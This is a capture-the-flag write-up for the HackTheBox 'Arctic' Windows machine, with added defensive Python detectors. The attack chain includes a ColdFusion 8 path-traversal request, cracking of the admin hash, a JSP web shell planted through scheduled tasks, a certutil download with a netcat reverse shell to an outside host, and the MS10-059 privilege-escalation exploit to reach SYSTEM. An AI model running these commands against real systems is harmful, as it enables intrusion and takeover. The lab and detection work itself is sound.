hackthebox – arctic – windows

Starting with nmap

# nmap 10.10.10.11
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-22 07:03 EDT
Nmap scan report for 10.10.10.11
Host is up (0.25s latency).
Not shown: 997 filtered ports
PORT      STATE SERVICE
135/tcp   open  msrpc
8500/tcp  open  fmtp
49154/tcp open  unknown

Only three ports are open. Browsing http://10.10.10.11:8500 shows two directories; these folders are characteristic of ColdFusion.

[Screenshot: hackthebox – coldfusion]

http://10.10.10.11:8500/CFIDE/administrator reveals the following page:

[Screenshot: hackthebox – coldfusion 8 administrator login page]

ColdFusion 6 to 10 is vulnerable to an LFI attack. From the above screenshot we know the CF version is 8. We will use the following request, as suggested here.

http://10.10.10.11/CFIDE/administrator/enter.cfm?locale=................\ColdFusion8\lib\password.properties%00en

[Screenshot: hackthebox – coldfusion 8 LFI]

From the above we get the contents of password.properties:

#Wed Mar 22 20:53:51 EET 2017
rdspassword=0IA/F[[E>[$_6& \\Q>[K\=XP
password=2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03
encrypted=true
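From the defender's side, the request above is easy to spot in the web-server log: a locale parameter carries path separators, a null byte and a file name. The following is an added example (not part of the original write-up) that parses constructed combined-log-style lines and flags the pattern. The log layout, the sample lines and the source addresses are assumptions made up for the example; only the enter.cfm path and the password.properties file name come from the page.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines in a combined-log-like layout, standing in for
# the ColdFusion web-server log. They are sample data, not taken from the page.
SAMPLE_LOG = """\
10.10.14.7 - - [22/Jun/2019:07:10:01 -0400] "GET /CFIDE/administrator/index.cfm HTTP/1.1" 200 5120
10.10.14.7 - - [22/Jun/2019:07:12:44 -0400] "GET /CFIDE/administrator/enter.cfm?locale=................\\ColdFusion8\\lib\\password.properties%00en HTTP/1.1" 200 812
10.10.14.7 - - [22/Jun/2019:07:13:02 -0400] "GET /CFIDE/administrator/enter.cfm?locale=..%5c..%5c..%5cColdFusion8%5clib%5cpassword.properties%00en HTTP/1.1" 200 812
10.10.10.5 - - [22/Jun/2019:07:15:09 -0400] "GET /CFIDE/administrator/enter.cfm?locale=en HTTP/1.1" 200 4410
"""

LOG_LINE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)
# The administrator login page whose locale parameter the write-up abuses.
ENTER_CFM = re.compile(r"/cfide/administrator/enter\.cfm$", re.I)


def locale_indicators(value):
    """Return the reasons a decoded locale value looks like a file read, not a locale."""
    reasons = []
    if "\x00" in value:                      # %00 truncates the suffix the app appends
        reasons.append("null-byte")
    if ".." in value or "\\" in value or "/" in value:
        reasons.append("traversal")          # a locale name never contains path separators
    if "password.properties" in value.lower():
        reasons.append("sensitive-file")     # the file the write-up reads
    return reasons


def analyze_line(line):
    """Parse one access-log line; return a finding dict, or None if nothing is suspicious."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    if not ENTER_CFM.search(url.path):
        return None
    # parse_qs percent-decodes the values, so %00 and %5c become "\x00" and "\".
    params = parse_qs(url.query, keep_blank_values=True)
    reasons = []
    for value in params.get("locale", []):
        for r in locale_indicators(value):
            if r not in reasons:
                reasons.append(r)
    if not reasons:
        return None
    return {"src": m["src"], "ts": m["ts"], "status": int(m["status"]), "reasons": reasons}


def scan_log(text):
    """Run analyze_line over every line and keep only the findings."""
    return [f for f in (analyze_line(l) for l in text.splitlines()) if f]


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['src']} HTTP {f['status']}: {', '.join(f['reasons'])}")
```

Decoding before matching matters: the second and third sample lines encode the same request differently (literal backslashes versus %5c), and a rule that only greps the raw line for `password.properties` would still miss a request that percent-encodes the file name. A 200 status on a flagged request is the signal that the file was actually served.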

Cracking the hash with john quickly reveals that the password is happyday.

# john hash.txt

Warning: detected hash type "Raw-SHA1", but the string is also recognized as "Raw-SHA1-AxCrypt"
Use the "--format=Raw-SHA1-AxCrypt" option to force loading these as that type instead
Warning: detected hash type "Raw-SHA1", but the string is also recognized as "Raw-SHA1-Linkedin"
Use the "--format=Raw-SHA1-Linkedin" option to force loading these as that type instead
Warning: detected hash type "Raw-SHA1", but the string is also recognized as "ripemd-160"
Use the "--format=ripemd-160" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA1 [SHA1 32/32])
Warning: no OpenMP support for this hash type, consider --fork=2
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
happyday         (?)
1g 0:00:00:00 DONE 2/3 (2019-06-22 08:18) 1.960g/s 2850p/s 2850c/s 2850C/s happyday
Use the "--show --format=Raw-SHA1" options to display all of the cracked passwords reliably
Session completed

Now we can log in as user admin with the password above.

On the left-hand side, click on "Settings Summary"; it shows the full path of /CFIDE.

[Screenshot: hackthebox – coldfusion 8 /CFIDE full path]

Also on the left-hand side, we can click on "Scheduled Tasks" to make the server download our payload and write it to disk.

[Screenshot: hackthebox – arctic – upload jsp shell]

The main thing to keep in mind here is that we need to set up an HTTP server and serve cmdjsp.jsp, which is found in Kali by default.

Save by clicking on Submit, and run the task by clicking on the green action button.

[Screenshot: hackthebox – jsp shell]

Our task runs and the file is saved under the /CFIDE path, so we can execute it by clicking on it.

[Screenshot: hackthebox – shell]

As we can see, we can now run commands and do whatever we want. Let's get a shell.

Run the following on the box:

certutil -urlcache -split -f http://10.10.14.7/nc.exe & nc.exe 10.10.14.7 1234 -e cmd.exe

Don't forget to set up the listener:

# nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.11] 49838
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\ColdFusion8\runtime\bin>whoami
whoami
arctic\tolis
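The foothold above leaves a distinctive process tree: the application server spawns cmd.exe, certutil fetches a binary from a URL, and a netcat binary runs with `-e cmd.exe`. The following is an added example (not from the original write-up) that evaluates three detection rules over constructed process-creation events in a Sysmon-like shape. The field names, the event contents and the parent image jrun.exe (taken here to be ColdFusion 8's server process) are assumptions; the command lines mirror the ones the page runs.

```python
import re
from ntpath import basename

# Constructed process-creation events (Sysmon-like shape). Field names, the
# jrun.exe parent and all paths are assumptions made for this example.
SAMPLE_EVENTS = [
    {"id": 1, "user": "arctic\\tolis",
     "parent_image": "C:\\ColdFusion8\\runtime\\bin\\jrun.exe",
     "image": "C:\\Windows\\System32\\cmd.exe",
     "command_line": "cmd.exe /c certutil -urlcache -split -f http://10.10.14.7/nc.exe & nc.exe 10.10.14.7 1234 -e cmd.exe"},
    {"id": 2, "user": "arctic\\tolis",
     "parent_image": "C:\\Windows\\System32\\cmd.exe",
     "image": "C:\\Windows\\System32\\certutil.exe",
     "command_line": "certutil -urlcache -split -f http://10.10.14.7/nc.exe"},
    {"id": 3, "user": "arctic\\tolis",
     "parent_image": "C:\\Windows\\System32\\cmd.exe",
     "image": "C:\\ColdFusion8\\runtime\\bin\\nc.exe",
     "command_line": "nc.exe 10.10.14.7 1234 -e cmd.exe"},
    {"id": 4, "user": "arctic\\tolis",                     # benign certutil use
     "parent_image": "C:\\Windows\\explorer.exe",
     "image": "C:\\Windows\\System32\\certutil.exe",
     "command_line": "certutil -hashfile C:\\Users\\tolis\\report.pdf SHA256"},
    {"id": 5, "user": "NT AUTHORITY\\SYSTEM",              # ordinary service host
     "parent_image": "C:\\Windows\\System32\\services.exe",
     "image": "C:\\Windows\\System32\\svchost.exe",
     "command_line": "svchost.exe -k netsvcs"},
]

URL = re.compile(r"https?://", re.I)
# "-e cmd.exe" / "-e powershell": a program handing a shell to a socket.
SHELL_EXEC = re.compile(r"(?:^|\s)-e\s+(?:cmd|powershell)(?:\.exe)?(?:\s|$)", re.I)
# Server processes that should never spawn an interactive shell:
# w3wp.exe is the IIS worker, jrun.exe the assumed ColdFusion 8 server process.
WEB_SERVERS = {"jrun.exe", "w3wp.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}


def evaluate(event):
    """Return the names of the rules the event matches, in a fixed order."""
    cmd = event["command_line"].lower()
    hits = []
    # certutil used as a downloader: -urlcache plus a URL on the command line.
    if "certutil" in cmd and "-urlcache" in cmd and URL.search(cmd):
        hits.append("certutil-url-fetch")
    if SHELL_EXEC.search(cmd):
        hits.append("reverse-shell-exec")
    parent = basename(event["parent_image"]).lower()
    image = basename(event["image"]).lower()
    if parent in WEB_SERVERS and image in SHELLS:
        hits.append("web-server-spawned-shell")
    return hits


def scan(events):
    """Return (event id, matched rules) for every event that matches at least one rule."""
    results = []
    for event in events:
        hits = evaluate(event)
        if hits:
            results.append((event["id"], hits))
    return results


if __name__ == "__main__":
    for event_id, hits in scan(SAMPLE_EVENTS):
        print(f"event {event_id}: {', '.join(hits)}")
```

Event 4 is the reason the certutil rule requires both `-urlcache` and a URL: hashing a file with certutil is routine administration and should not page anyone. The parent/child rule is the highest-confidence of the three, because a web or application server spawning cmd.exe has almost no legitimate explanation, and it fires on the first event regardless of what the command line contains.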

Run the systeminfo command and save its output to a file, sysinfo.txt. Then run windows-exploit-suggester.py against it:

# python windows-exploit-suggester.py --database 2019-06-09-mssb.xls --systeminfo ~/htb/artic/sysinfo.txt 
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (utf-8)
[*] querying database file for potential vulnerabilities
[*] comparing the 0 hotfix(es) against the 197 potential bulletins(s) with a database of 137 known exploits
[*] there are now 197 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2008 R2 64-bit'
[*] 
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*]   http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*]   http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*] 
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
[*] done

We got a few privilege escalation suggestions. The others didn't work for me; only MS10-059 worked. Download it from here.
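The suggester output is a flat list that mixes bulletins, PoC links and severities, and the defender's question is the reverse of the attacker's: which bulletins apply, and which of them are local elevation-of-privilege fixes that matter once an attacker already has a low-privileged shell. The following is an added example (not from the write-up or from the windows-exploit-suggester project) that parses the output shown above into records and separates the elevation-of-privilege bulletins. The sample input is the page's own suggester output; the function names are this example's.

```python
import re

# The suggester output from the write-up, embedded here as the sample input.
SUGGESTER_OUTPUT = """\
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*]   http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*]   http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*]
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
[*] done
"""

# "[E] MS10-059: <title> (<KB>) - <severity>"; E = exploit-db PoC, M = Metasploit module.
BULLETIN = re.compile(
    r"^\[(?P<flag>[EM])\] (?P<bulletin>MS\d{2}-\d{3}): (?P<title>.+) "
    r"\((?P<kb>\d+)\) - (?P<severity>\w+)$"
)
# "[*]   <url> -- <description>" lines belong to the bulletin directly above them.
POC_LINK = re.compile(r"^\[\*\]\s+(?P<url>https?://\S+) -- (?P<desc>.+)$")


def parse_suggester(text):
    """Turn the suggester's flat output into one record per bulletin, PoC links attached."""
    records = []
    for line in text.splitlines():
        m = BULLETIN.match(line)
        if m:
            rec = m.groupdict()
            rec["links"] = []
            records.append(rec)
            continue
        m = POC_LINK.match(line)
        if m and records:
            records[-1]["links"].append(m["url"])
    return records


def local_privesc(records):
    """Bulletins whose title is an elevation-of-privilege fix."""
    return [r for r in records if "elevation of privilege" in r["title"].lower()]


def missing_kbs(records):
    """KB numbers the host is missing, in the order the suggester listed them."""
    kbs = []
    for r in records:
        if r["kb"] not in kbs:
            kbs.append(r["kb"])
    return kbs


if __name__ == "__main__":
    recs = parse_suggester(SUGGESTER_OUTPUT)
    print(f"{len(recs)} bulletins, {len(local_privesc(recs))} elevation-of-privilege fixes")
    for r in local_privesc(recs):
        print(f"  {r['bulletin']} KB{r['kb']} [{r['flag']}] {r['severity']}")
    print("KBs to install:", ", ".join(missing_kbs(recs)))
```

Note that the suggester compared zero hotfixes against the database, so the host has effectively never been patched; the five elevation-of-privilege bulletins are the ones that turn a ColdFusion service account into SYSTEM, and the list of KB numbers is what goes to the patching ticket.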

Set up another listener:

# nc -lvnp 4444

Download the MS10-059 binary and run it:

C:\Users\tolis>certutil -urlcache -split -f http://10.10.14.7/ms10-059.exe ms10-059.exe

C:\Users\tolis>ms10-059.exe
ms10-059.exe
/Chimichurri/-->This exploit gives you a Local System shell <BR>/Chimichurri/-->Usage: Chimichurri.exe ipaddress port <BR>

C:\Users\tolis>ms10-059.exe 10.10.14.7 4444
ms10-059.exe 10.10.14.7 4444
/Chimichurri/-->This exploit gives you a Local System shell <BR>/Chimichurri/-->Changing registry values...<BR>/Chimichurri/-->Got SYSTEM token...<BR>/Chimichurri/-->Running reverse shell...<BR>/Chimichurri/-->Restoring default registry values...<BR>

We got a shell with SYSTEM privileges.

# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.11] 49903
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\tolis>whoami
whoami
nt authority\system

We can now read the flags:

c:\> type c:\Users\tolis\Desktop\user.txt
c:\> type c:\Users\Administrator\Desktop\root.txt
